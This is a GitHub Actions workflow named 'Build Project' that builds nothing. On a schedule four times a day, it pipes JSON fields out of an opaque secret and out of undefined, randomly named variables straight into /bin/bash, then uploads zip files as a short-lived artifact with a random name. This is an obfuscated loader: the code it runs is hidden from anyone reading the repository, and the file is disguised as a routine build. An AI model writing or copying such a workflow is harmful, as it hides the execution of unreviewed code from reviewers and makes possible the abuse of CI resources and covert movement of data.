name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '25 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  validate:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Run task
        env:
          rgsic0106: ${{ secrets.rgsic0106 }}
        run: |
          printf '%s' "$rgsic0106" | jq -r .pmntu1 | /bin/bash
          printf '%s' "$hsdhi369" | jq -r .kjpsx6 | /bin/bash
          printf '%s' "$pqc271" | jq -r .v09327 | /bin/bash
          printf '%s' "$wmtyg9" | jq -r .keuo6 | /bin/bash
          echo $wovwg3519 | jq -r .ini32816 | /bin/bash

      - name: Store output
        uses: actions/upload-artifact@v4
        with:
          name: a1W2JCdw
          path: "*.zip"
          retention-days: 1
